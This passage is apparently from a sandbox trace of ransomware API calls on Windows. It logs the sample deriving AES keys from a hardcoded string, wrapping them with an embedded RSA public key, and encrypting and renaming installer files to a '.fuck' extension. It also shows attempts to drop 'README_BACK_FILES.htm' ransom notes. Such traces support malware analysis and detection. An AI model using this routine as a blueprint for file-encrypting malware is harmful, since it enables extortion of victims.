pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.926] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.926] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f1c18) returned 1 [0240.926] CryptImportPublicKeyInfo (in: hCryptProv=0x28f1c18, dwCertEncodingType=0x1, pInfo=0x2905418*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2905448*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2905450*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e7438) returned 1 [0240.927] CryptEncrypt (in: hKey=0x28e7438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.927] CryptEncrypt (in: hKey=0x28e7438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f1f48*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f1f48*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.927] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f1f48, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.927] ReadFile (in: hFile=0xffffffff, lpBuffer=0x291cb18, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x291cb18, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.927] CryptEncrypt (in: hKey=0x28e7378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x291cb18*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x291cb18*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.927] WriteFile (in: hFile=0xffffffff, lpBuffer=0x291cb18, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.927] CloseHandle (hObject=0xffffffff) returned 1 [0240.927] CloseHandle (hObject=0xffffffff) returned 1 [0240.927] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), bFailIfExists=0) returned 0 [0240.928] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x0) returned 0 [0240.929] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg")) returned 0 [0240.929] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.fuck" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.fuck")) returned 0 [0240.930] CryptDestroyHash (hHash=0x28e7238) returned 1 [0240.930] CryptDestroyKey (hKey=0x28e7378) returned 1 [0240.930] CryptReleaseContext (hProv=0x28f2b80, dwFlags=0x0) returned 1 [0240.930] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.930] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.930] GetLastError () returned 0x5 [0240.930] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi")) returned 0x20 [0240.930] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", dwFileAttributes=0x80) returned 0 [0240.931] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.931] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.932] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg", dwFileAttributes=0x2) returned 0 [0240.932] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f26b8) returned 1 [0240.934] CryptCreateHash (in: hProv=0x28f26b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.934] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.934] CryptHashData (hHash=0x28e77f8, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.934] CryptDeriveKey (in: hProv=0x28f26b8, Algid=0x6610, hBaseData=0x28e77f8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7738) returned 1 [0240.935] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.935] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.935] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f2388) returned 1 [0240.935] CryptImportPublicKeyInfo (in: hCryptProv=0x28f2388, dwCertEncodingType=0x1, pInfo=0x29054e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2905518*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2905520*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e7378) returned 1 [0240.935] CryptEncrypt (in: hKey=0x28e7378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.935] CryptEncrypt (in: hKey=0x28e7378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f2300*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f2300*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.935] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f2300, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.936] ReadFile (in: hFile=0xffffffff, lpBuffer=0x291cb18, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x291cb18, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.936] CryptEncrypt (in: hKey=0x28e7738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x291cb18*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x291cb18*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.936] WriteFile (in: hFile=0xffffffff, lpBuffer=0x291cb18, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.936] CloseHandle (hObject=0xffffffff) returned 1 [0240.936] CloseHandle (hObject=0xffffffff) returned 1 [0240.936] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), bFailIfExists=0) returned 0 [0240.936] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", dwFileAttributes=0x0) returned 0 [0240.937] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg")) returned 0 [0240.937] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.fuck" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.fuck")) returned 0 [0240.938] CryptDestroyHash (hHash=0x28e77f8) returned 1 [0240.938] CryptDestroyKey (hKey=0x28e7738) returned 1 [0240.938] CryptReleaseContext (hProv=0x28f26b8, dwFlags=0x0) returned 1 [0240.938] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.938] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.938] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\readme_back_files.htm")) returned 0xffffffff [0240.938] AreFileApisANSI () returned 1 [0240.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x291c9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 138 [0240.938] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.939] GetLastError () returned 0x5 [0240.939] GetLastError () returned 0x5 [0240.939] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.939] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.939] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\readme_back_files.htm")) returned 0xffffffff [0240.939] AreFileApisANSI () returned 1 [0240.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0240.939] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.940] GetLastError () returned 0x5 [0240.940] GetLastError () returned 0x5 [0240.940] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.940] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.940] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\readme_back_files.htm")) returned 0xffffffff [0240.940] AreFileApisANSI () returned 1 [0240.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0240.941] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.941] GetLastError () returned 0x5 [0240.941] GetLastError () returned 0x5 [0240.941] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.941] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.941] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.941] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.941] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8578 [0240.942] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.942] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.942] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e8638 [0240.942] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.942] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.942] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.942] GetLastError () returned 0x5 [0240.942] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab")) returned 0x20 [0240.942] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0240.943] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.943] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.944] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0240.944] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f2960) returned 1 [0240.947] CryptCreateHash (in: hProv=0x28f2960, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.947] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.947] CryptHashData (hHash=0x28e7238, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.947] CryptDeriveKey (in: hProv=0x28f2960, Algid=0x6610, hBaseData=0x28e7238, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e76b8) returned 1 [0240.947] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.947] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.947] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f2740) returned 1 [0240.948] CryptImportPublicKeyInfo (in: hCryptProv=0x28f2740, dwCertEncodingType=0x1, pInfo=0x2906fb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2906fe8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2906ff0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e7538) returned 1 [0240.948] CryptEncrypt (in: hKey=0x28e7538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.948] CryptEncrypt (in: hKey=0x28e7538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f2a70*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f2a70*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.948] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f2a70, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.948] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.948] CryptEncrypt (in: hKey=0x28e76b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.948] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.948] CloseHandle (hObject=0xffffffff) returned 1 [0240.948] CloseHandle (hObject=0xffffffff) returned 1 [0240.948] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), bFailIfExists=0) returned 0 [0240.949] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x0) returned 0 [0240.949] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg")) returned 0 [0240.949] MoveFileA (lpExistingFileName="C:\\\\Users\\All 